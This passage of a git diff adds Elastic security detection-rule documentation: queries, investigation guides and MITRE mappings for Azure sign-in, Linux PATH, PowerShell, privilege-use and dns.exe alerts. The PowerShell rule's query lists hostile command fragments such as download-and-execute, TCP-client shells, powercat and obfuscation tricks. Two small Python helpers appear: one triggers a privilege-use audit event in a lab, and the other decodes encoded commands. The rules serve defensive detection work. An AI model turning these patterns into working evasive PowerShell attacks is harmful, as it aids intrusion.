Esql.azure_signinlogs_properties_session_id_count_distinct, + Esql.azure_signinlogs_properties_app_display_name_values, + Esql.azure_signinlogs_properties_app_id_values, + Esql.azure_signinlogs_properties_resource_id_values, + Esql.azure_signinlogs_properties_resource_display_name_values, + Esql.azure_signinlogs_properties_app_owner_tenant_id_values, + Esql.azure_signinlogs_properties_resource_owner_tenant_id_values, + Esql.azure_signinlogs_properties_conditional_access_status_values, + Esql.azure_signinlogs_properties_risk_state_values, + Esql.azure_signinlogs_properties_risk_level_aggregated_values, + Esql.azure_signinlogs_properties_device_detail_browser_values, + Esql.azure_signinlogs_properties_device_detail_operating_system_values, + Esql.user_agent_original_values, + Esql.is_browser_case_max, + Esql.event_count + +| where + Esql.source_address_count_distinct >= 2 and + Esql.azure_signinlogs_properties_session_id_count_distinct == 1 and + Esql.is_browser_case_max >= 1 and + Esql.event_count >= 2 + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Cloud Accounts +** ID: T1078.004 +** Reference URL: https://attack.mitre.org/techniques/T1078/004/ +* Technique: +** Name: Phishing +** ID: T1566 +** Reference URL: https://attack.mitre.org/techniques/T1566/ +* Sub-technique: +** Name: Spearphishing Link +** ID: T1566.002 +** Reference URL: https://attack.mitre.org/techniques/T1566/002/ +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Steal Application Access Token +** ID: T1528 +** Reference URL: https://attack.mitre.org/techniques/T1528/ diff --git 
a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-suspicious-path-invocation-from-command-line.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-suspicious-path-invocation-from-command-line.asciidoc new file mode 100644 index 0000000000..0dffa42f3a --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-suspicious-path-invocation-from-command-line.asciidoc @@ -0,0 +1,171 @@ +[[prebuilt-rule-8-19-8-suspicious-path-invocation-from-command-line]] +=== Suspicious Path Invocation from Command Line + +This rule detects a PATH environment variable assignment within a command-line invocation by a shell process. This behavior is unusual and may indicate an attempt to execute a command from a non-standard location. This technique may be used to evade detection or perform unauthorized actions on the system. + +*Rule type*: new_terms + +*Rule indices*: + +* logs-endpoint.events.process* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://blog.exatrack.com/Perfctl-using-portainer-and-new-persistences/ + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Execution +* Tactic: Defense Evasion +* Data Source: Elastic Defend +* Resources: Investigation Guide + +*Version*: 5 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Suspicious Path Invocation from Command Line* + + +In Linux environments, shell processes like bash or zsh execute commands, often using the PATH variable to locate executables. Adversaries may manipulate PATH to run malicious scripts from non-standard directories, evading detection. The detection rule identifies unusual PATH assignments in command lines, signaling potential unauthorized actions by monitoring specific shell invocations and command patterns. + + +*Possible investigation steps* + + +- Review the command line details captured in the alert to identify the specific PATH assignment and the command being executed. This can provide insight into whether the command is expected or potentially malicious. +- Check the process tree to understand the parent process and any child processes spawned by the suspicious shell invocation. This can help determine the context in which the command was executed. +- Investigate the user account associated with the process to determine if the activity aligns with the user's typical behavior or if the account may have been compromised. +- Examine the directory from which the command is being executed to verify if it is a non-standard or suspicious location. Look for any unusual files or scripts in that directory. +- Cross-reference the event with other security logs or alerts to identify any correlated activities that might indicate a broader attack or compromise.
+- Assess the system's recent changes or updates to determine if they could have inadvertently caused the PATH modification or if it was intentionally altered by an adversary. + + +*False positive analysis* + + +- System administrators or developers may intentionally modify the PATH variable for legitimate purposes, such as testing scripts or applications in development environments. To handle this, create exceptions for known users or specific directories commonly used for development. +- Automated scripts or configuration management tools might alter the PATH variable as part of their normal operation. Identify these scripts and exclude their execution paths or user accounts from triggering alerts. +- Some software installations or updates may temporarily change the PATH variable to include non-standard directories. Monitor installation processes and whitelist these activities when performed by trusted sources. +- Custom shell configurations or user profiles might include PATH modifications for convenience or performance reasons. Review and document these configurations, and exclude them from detection if they are verified as non-threatening. +- Educational or training environments where users experiment with shell commands may frequently trigger this rule. Consider excluding specific user groups or environments dedicated to learning and experimentation. + + +*Response and remediation* + + +- Immediately isolate the affected system from the network to prevent potential lateral movement or data exfiltration. +- Terminate any suspicious processes identified by the alert to stop any ongoing unauthorized actions. +- Review the command history and PATH variable changes on the affected system to identify any unauthorized modifications or scripts executed from non-standard directories. +- Restore the PATH variable to its default state to ensure that only trusted directories are used for command execution. +- Conduct a thorough scan of the system using updated antivirus or endpoint detection tools to identify and remove any malicious scripts or files. +- Escalate the incident to the security operations center (SOC) or incident response team for further analysis and to determine if additional systems are affected. +- Implement monitoring for similar PATH manipulation attempts across the network to enhance detection and prevent recurrence. + +==== Setup + + + +*Setup* + + +This rule requires data coming in from Elastic Defend. + + +*Elastic Defend Integration Setup* + +Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app. + + +*Prerequisite Requirements:* + +- Fleet is required for Elastic Defend. +- To configure Fleet Server refer to the https://www.elastic.co/guide/en/fleet/current/fleet-server.html[documentation]. + + +*The following steps should be executed in order to add the Elastic Defend integration on a Linux System:* + +- Go to the Kibana home page and click "Add integrations". +- In the query bar, search for "Elastic Defend" and select the integration to see more details about it. +- Click "Add Elastic Defend". +- Configure the integration name and optionally add a description. +- Select the type of environment you want to protect, either "Traditional Endpoints" or "Cloud Workloads". +- Select a configuration preset. 
Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html[Helper guide]. +- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" +- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead. +For more details on Elastic Agent configuration settings, refer to the https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html[helper guide]. +- Click "Save and Continue". +- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts. +For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/security/current/install-endpoint.html[helper guide]. + + +==== Rule query + + +[source, js] +---------------------------------- +event.category:process and host.os.type:linux and event.type:start and event.action:exec and +process.name:(bash or csh or dash or fish or ksh or sh or tcsh or zsh) and process.args:-c and +process.command_line:*PATH=* and +not ( + process.command_line:(*_PATH=* or *PYTHONPATH=* or sh*/run/motd.dynamic.new) or + process.parent.executable:( + "/opt/puppetlabs/puppet/bin/puppet" or /var/lib/docker/overlay2/* or /vz/root/*/dovecot or + "/usr/libexec/dovecot/auth" or /home/*/.local/share/containers/* or /vz/root/*/dovecot/auth + ) or + process.parent.command_line:"runc init" +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Unix Shell +** ID: T1059.004 +** Reference URL: https://attack.mitre.org/techniques/T1059/004/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Hide Artifacts +** ID: T1564 +** Reference URL: https://attack.mitre.org/techniques/T1564/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-suspicious-powershell-engine-imageload.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-suspicious-powershell-engine-imageload.asciidoc new file mode 100644 index 0000000000..ce8c23d632 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-suspicious-powershell-engine-imageload.asciidoc @@ -0,0 +1,158 @@ +[[prebuilt-rule-8-19-8-suspicious-powershell-engine-imageload]] +=== Suspicious PowerShell Engine ImageLoad + +Identifies the PowerShell engine being invoked by unexpected processes. Rather than executing PowerShell functionality with powershell.exe, some attackers do this to operate more stealthily. 
+ +*Rule type*: new_terms + +*Rule indices*: + +* logs-endpoint.events.library-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/security-labs/elastic-security-labs-steps-through-the-r77-rootkit + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Execution +* Resources: Investigation Guide +* Data Source: Elastic Defend + +*Version*: 214 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Suspicious PowerShell Engine ImageLoad* + + +PowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code. + +Attackers can use PowerShell without having to execute `PowerShell.exe` directly. This technique, often called "PowerShell without PowerShell," works by using the underlying System.Management.Automation namespace and can bypass application allowlisting and PowerShell security features. + + +*Possible investigation steps* + + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Investigate abnormal behaviors observed by the subject process, such as network connections, registry or file modifications, and any spawned child processes. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Inspect the host for suspicious or abnormal behavior in the alert timeframe. +- Retrieve the implementation (DLL, executable, etc.) and determine if it is malicious: + - Use a private sandboxed malware analysis system to perform analysis. + - Observe and collect information about the following activities: + - Attempts to contact external domains and addresses. + - File and registry access, modification, and creation activities. + - Service creation and launch activities. + - Scheduled task creation. + - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values. + - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. + + +*False positive analysis* + + +- This activity can happen legitimately. Some vendors have their own PowerShell implementations that are shipped with some products. These benign true positives (B-TPs) can be added as exceptions if necessary after analysis. + + +*Response and remediation* + + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved hosts to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. 
+- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + + +==== Rule query + + +[source, js] +---------------------------------- +host.os.type:windows and event.category:library and + dll.name:("System.Management.Automation.dll" or "System.Management.Automation.ni.dll") and + not ( + process.code_signature.subject_name:( + "Microsoft Corporation" or + "Microsoft Dynamic Code Publisher" or + "Microsoft Windows" + ) and process.code_signature.trusted:true and not process.name.caseless:"regsvr32.exe" + ) and + not ( + process.executable:(C\:\\Program*Files*\(x86\)\\*.exe or C\:\\Program*Files\\*.exe) and + process.code_signature.trusted:true + ) and + not ( + process.executable: C\:\\Windows\\Lenovo\\*.exe and process.code_signature.subject_name:"Lenovo" and + process.code_signature.trusted:true + ) and + not ( + process.executable: C\:\\Windows\\AdminArsenal\\PDQInventory-Scanner\\service-*\\exec\\PDQInventoryScanner.exe and + process.code_signature.subject_name:"PDQ.com Corporation" and + process.code_signature.trusted:true + ) and + not ( + process.executable: C\:\\Windows\\Temp\\\{*\}\\_is*.exe and + process.code_signature.subject_name:("Dell Technologies Inc." or "Dell Inc" or "Dell Inc.") and + process.code_signature.trusted:true + ) and + not ( + process.executable: C\:\\ProgramData\\chocolatey\\* and + process.code_signature.subject_name:("Chocolatey Software, Inc." or "Chocolatey Software, Inc") and + process.code_signature.trusted:true + ) and + not process.executable : ( + "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" or + "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-suspicious-seincreasebasepriorityprivilege-use.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-suspicious-seincreasebasepriorityprivilege-use.asciidoc new file mode 100644 index 0000000000..493293821e --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-suspicious-seincreasebasepriorityprivilege-use.asciidoc @@ -0,0 +1,126 @@ +[[prebuilt-rule-8-19-8-suspicious-seincreasebasepriorityprivilege-use]] +=== Suspicious SeIncreaseBasePriorityPrivilege Use + +Identifies attempts to use the SeIncreaseBasePriorityPrivilege privilege by an unusual process. This could be related to hijacking the execution flow of a process via thread priority manipulation.
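+
+As an illustration only (not taken from the rule or its references), the following Python sketch uses the Win32 API via `ctypes` to request the REALTIME priority class for the current process. Setting that priority class normally requires the "Increase scheduling priority" user right (SeIncreaseBasePriorityPrivilege), so running the sketch in a lab host with the audit policy from the Setup section below enabled should produce the kind of event 4674 activity this rule inspects; constant and function names follow the public Win32 documentation.
+
+[source, python]
+----------------------------------
+import ctypes
+
+# "Realtime" base priority class constant from the Win32 SetPriorityClass API.
+REALTIME_PRIORITY_CLASS = 0x00000100
+
+kernel32 = ctypes.WinDLL("kernel32", use_last_error=True)
+
+# Pseudo-handle to the current process; it does not need to be closed.
+current_process = kernel32.GetCurrentProcess()
+
+# Requesting REALTIME_PRIORITY_CLASS exercises SeIncreaseBasePriorityPrivilege;
+# with "Audit Sensitive Privilege Use" enabled this may be recorded as 4674.
+if kernel32.SetPriorityClass(current_process, REALTIME_PRIORITY_CLASS):
+    print("SetPriorityClass succeeded; check the Security log for event 4674.")
+else:
+    print("SetPriorityClass failed, error:", ctypes.get_last_error())
+----------------------------------
+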
+ +*Rule type*: query + +*Rule indices*: + +* logs-system.security* +* logs-windows.forwarded* +* winlogbeat-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://github.com/Octoberfest7/ThreadCPUAssignment_POC/tree/main +* https://x.com/sixtyvividtails/status/1970721197617717483 +* https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4674 + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Data Source: Windows Security Event Logs +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Suspicious SeIncreaseBasePriorityPrivilege Use* + + +SeIncreaseBasePriorityPrivilege allows a user or process to increase the base priority of processes running on the system so that the CPU scheduler allows them to pre-empt other, lower-priority processes when the higher-priority process has work to do. + + +*Possible investigation steps* + + +- Review the process.executable reputation and its execution chain. +- Investigate whether the SubjectUserName is expected to perform this action. +- Correlate the event with other security alerts or logs to identify any patterns or additional suspicious activities that might suggest a broader attack campaign. +- Check the agent health status and verify if there is any tampering with endpoint security processes. + + +*False positive analysis* + + +- Administrative tasks involving legitimate CPU scheduling priority changes. + + +*Response and remediation* + + +- Immediately isolate the affected machine from the network to prevent further unauthorized access or lateral movement within the domain. +- Terminate the processes involved in the execution chain. +- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to ensure comprehensive remediation efforts are undertaken. + +==== Setup + + + +*Setup* + + +Ensure advanced audit policies for Windows are enabled, specifically: +Audit Sensitive Privilege Use https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4674[Event ID 4674] (An operation was attempted on a privileged object.)
+ +``` +Computer Configuration > +Policies > +Windows Settings > +Security Settings > +Advanced Audit Policies Configuration > +Audit Policies > +Privilege Use > +Audit Sensitive Privilege Use (Success) +``` + + +==== Rule query + + +[source, js] +---------------------------------- +event.category:iam and event.code:"4674" and +winlog.event_data.PrivilegeList:"SeIncreaseBasePriorityPrivilege" and event.outcome:"success" and +winlog.event_data.AccessMask:"512" and not winlog.event_data.SubjectUserSid:("S-1-5-18" or "S-1-5-19" or "S-1-5-20") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Access Token Manipulation +** ID: T1134 +** Reference URL: https://attack.mitre.org/techniques/T1134/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-suspicious-windows-powershell-arguments.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-suspicious-windows-powershell-arguments.asciidoc new file mode 100644 index 0000000000..dc868e08e0 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-suspicious-windows-powershell-arguments.asciidoc @@ -0,0 +1,210 @@ +[[prebuilt-rule-8-19-8-suspicious-windows-powershell-arguments]] +=== Suspicious Windows Powershell Arguments + +Identifies the execution of PowerShell with suspicious argument values. This behavior is often observed during malware installation leveraging PowerShell. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.process-* +* logs-crowdstrike.fdr* +* logs-m365_defender.event-* +* logs-sentinel_one_cloud_funnel.* +* logs-system.security* +* logs-windows.forwarded* +* logs-windows.sysmon_operational-* +* winlogbeat-* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Execution +* Data Source: Windows Security Event Logs +* Data Source: Elastic Defend +* Data Source: Sysmon +* Data Source: SentinelOne +* Data Source: Microsoft Defender for Endpoint +* Data Source: Crowdstrike +* Data Source: Elastic Endgame +* Resources: Investigation Guide + +*Version*: 209 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Suspicious Windows Powershell Arguments* + + +PowerShell is a powerful scripting language and command-line shell used for task automation and configuration management in Windows environments. Adversaries exploit PowerShell's capabilities to execute malicious scripts, download payloads, and obfuscate commands. The detection rule identifies unusual PowerShell arguments indicative of such abuse, focusing on patterns like encoded commands, suspicious downloads, and obfuscation techniques, thereby flagging potential threats for further investigation. 
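+
+When triaging these alerts, a recurring step is decoding the Base64 value passed to `-EncodedCommand`/`-enc`, which PowerShell treats as UTF-16LE text. The following Python helper is an illustrative sketch for that step; the sample payload is fabricated for demonstration and is not taken from the rule:
+
+[source, python]
+----------------------------------
+import base64
+
+
+def decode_encoded_command(payload: str) -> str:
+    """Decode a powershell.exe -EncodedCommand value (Base64 over UTF-16LE)."""
+    return base64.b64decode(payload).decode("utf-16-le")
+
+
+# Fabricated example: encode a harmless command the way PowerShell expects,
+# then decode it as an analyst would when reviewing process.command_line.
+sample = base64.b64encode("Write-Output 'hello'".encode("utf-16-le")).decode()
+print(decode_encoded_command(sample))
+----------------------------------
+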
+ + +*Possible investigation steps* + + +- Review the process command line and arguments to identify any encoded or obfuscated content, such as Base64 strings or unusual character sequences, which may indicate malicious intent. +- Check the parent process of the PowerShell execution, especially if it is explorer.exe or cmd.exe, to determine if the PowerShell instance was launched from a suspicious or unexpected source. +- Investigate any network activity associated with the PowerShell process, particularly looking for connections to known malicious domains or IP addresses, or the use of suspicious commands like DownloadFile or DownloadString. +- Examine the user account associated with the PowerShell execution to determine if it aligns with expected behavior or if it might be compromised. +- Correlate the event with other security alerts or logs from the same host or user to identify patterns or additional indicators of compromise. +- Assess the risk and impact of the detected activity by considering the context of the environment, such as the presence of sensitive data or critical systems that might be affected. + + +*False positive analysis* + + +- Legitimate administrative scripts may use encoded commands for obfuscation to protect sensitive data. Review the script's source and purpose to determine if it is authorized. If confirmed, add the script's hash or specific command pattern to an allowlist. +- Automated software deployment tools might use PowerShell to download and execute scripts from trusted internal sources. Verify the source and destination of the download. If legitimate, exclude the specific tool or process from the detection rule. +- System maintenance tasks often involve PowerShell scripts that manipulate files or system settings. Identify routine maintenance scripts and exclude their specific command patterns or file paths from triggering the rule. +- Security software may use PowerShell for scanning or remediation tasks, which can mimic suspicious behavior. Confirm the software's legitimacy and add its processes to an exception list to prevent false alerts. +- Developers might use PowerShell for testing or development purposes, which can include obfuscation techniques. Validate the developer's activities and exclude their specific development environments or scripts from the rule. + + +*Response and remediation* + + +- Immediately isolate the affected system from the network to prevent further spread or communication with potential command and control servers. +- Terminate any suspicious PowerShell processes identified by the detection rule to halt ongoing malicious activities. +- Conduct a thorough scan of the affected system using updated antivirus or endpoint detection and response (EDR) tools to identify and remove any malicious payloads or scripts. +- Review and clean up any unauthorized changes to system configurations or scheduled tasks that may have been altered by the malicious PowerShell activity. +- Restore any affected files or system components from known good backups to ensure system integrity and functionality. +- Escalate the incident to the security operations center (SOC) or incident response team for further analysis and to determine if additional systems are compromised. +- Implement additional monitoring and logging for PowerShell activities across the network to enhance detection of similar threats in the future. 
+ +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + process.name : "powershell.exe" and + + not ( + ?user.id == "S-1-5-18" and + /* Don't apply the user.id exclusion to Sysmon for compatibility */ + not event.dataset : ("windows.sysmon_operational", "windows.sysmon") + ) and + + ( + process.command_line : ( + "*^*^*^*^*^*^*^*^*^*", + "*`*`*`*`*", + "*+*+*+*+*+*+*", + "*[char[]](*)*-join*", + "*Base64String*", + "*[*Convert]*", + "*.Compression.*", + "*-join($*", + "*.replace*", + "*MemoryStream*", + "*WriteAllBytes*", + "* -enc *", + "* -ec *", + "* /e *", + "* /enc *", + "* /ec *", + "*WebClient*", + "*DownloadFile*", + "*DownloadString*", + "* iex*", + "* iwr*", + "* aQB3AHIAIABpA*", + "*Reflection.Assembly*", + "*Assembly.GetType*", + "*$env:temp\\*start*", + "*powercat*", + "*nslookup -q=txt*", + "*$host.UI.PromptForCredential*", + "*Net.Sockets.TCPClient*", + "*curl *;Start*", + "powershell.exe \"<#*", + "*ssh -p *", + "*http*|iex*", + "*@SSL\\DavWWWRoot\\*.ps1*", + "*.lnk*.Seek(0x*", + "*[string]::join(*", + "*[Array]::Reverse($*", + "* hidden $(gc *", + "*=wscri& set*", + "*http'+'s://*", + "*.content|i''Ex*", + "*//:sptth*", + "*//:ptth*", + "*h''t''t''p*", + "*'tp'':''/'*", + "*$env:T\"E\"MP*", + "*;cmd /c $?", + "*s''t''a''r*", + "*$*=Get-Content*AppData*.SubString(*$*", + "*=cat *AppData*.substring(*);*$*", + "*-join'';*|powershell*", + "*.Content;sleep *|powershell*", + "*h\''t\''tp:\''*", + "*-e aQB3AHIAIABp*", + "*iwr *https*).Content*", + "*$env:computername*http*", + "*;InVoKe-ExpRESsIoN $COntent.CONTENt;*", + "*WebClient*example.com*", + "*=iwr $*;iex $*" + ) or + + (process.args : "-c" and process.args : "&{'*") or + + (process.args : "-Outfile" and process.args : "Start*") or + + (process.args : "-bxor" and process.args : "0x*") or + + process.args : "$*$*;set-alias" or + + ( + process.parent.name : ("explorer.exe", "cmd.exe") and + process.command_line : ("*-encodedCommand*", "*Invoke-webrequest*", "*WebClient*", "*Reflection.Assembly*")) + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-unusual-file-operation-by-dns-exe.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-unusual-file-operation-by-dns-exe.asciidoc new file mode 100644 index 0000000000..ac4758647c --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-unusual-file-operation-by-dns-exe.asciidoc @@ -0,0 +1,117 @@ +[[prebuilt-rule-8-19-8-unusual-file-operation-by-dns-exe]] +=== Unusual File Operation by dns.exe + +Identifies an unexpected file being modified by dns.exe, the process responsible for Windows DNS Server services, which may indicate activity related to remote code execution or other forms of exploitation. 
+ +*Rule type*: new_terms + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.file-* +* logs-windows.sysmon_operational-* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/ +* https://msrc-blog.microsoft.com/2020/07/14/july-2020-security-update-cve-2020-1350-vulnerability-in-windows-domain-name-system-dns-server/ +* https://www.elastic.co/security-labs/detection-rules-for-sigred-vulnerability + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Lateral Movement +* Data Source: Elastic Endgame +* Use Case: Vulnerability +* Data Source: Elastic Defend +* Data Source: Sysmon +* Resources: Investigation Guide + +*Version*: 216 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Unusual File Operation by dns.exe* + + +The rule flags Windows DNS Server (dns.exe) creating, changing, or deleting files that aren’t typical DNS zone or log files, which signals exploitation for code execution or abuse to stage payloads for lateral movement. After gaining execution in dns.exe via DNS RPC or parsing bugs, attackers often write a malicious EXE into System32 and register a new service, leveraging the trusted service context on a domain controller to persist and pivot. + + +*Possible investigation steps* + + +- Validate the modified file’s full path, type, and provenance, prioritizing writes in %SystemRoot%\System32, NETLOGON, or SYSVOL, and confirm signature, hash reputation, and compile timestamp to rapidly classify the artifact. +- Pivot to persistence telemetry around the same timestamp by hunting for new services or scheduled tasks (e.g., SCM 7045, Security 4697, TaskScheduler 106/200) and registry autoruns that reference the file. +- Correlate with DNS service network activity and logs for unusual RPC calls, authenticated connections from non-admin hosts, or spikes in failures/crashes that could indicate exploitation. +- Inspect the service’s runtime state for injection indicators by reviewing recent module loads, unsigned DLLs, suspicious memory sections, and ETW/Sysmon events mapping threads that performed the write. +- If the file is executable or a script or placed in execution-friendly locations, detonate it in a sandbox and scope the blast radius by pivoting on its hash, filename, and path across the fleet. + + +*False positive analysis* + + +- DNS debug logging configured to write to a file with a non-.log extension (e.g., .txt) causes dns.exe to legitimately create or rotate that file during troubleshooting. +- An administrator exports a zone to a custom-named file with a nonstandard extension (e.g., .txt or .xml), leading dns.exe to create or modify that file as part of routine maintenance. 
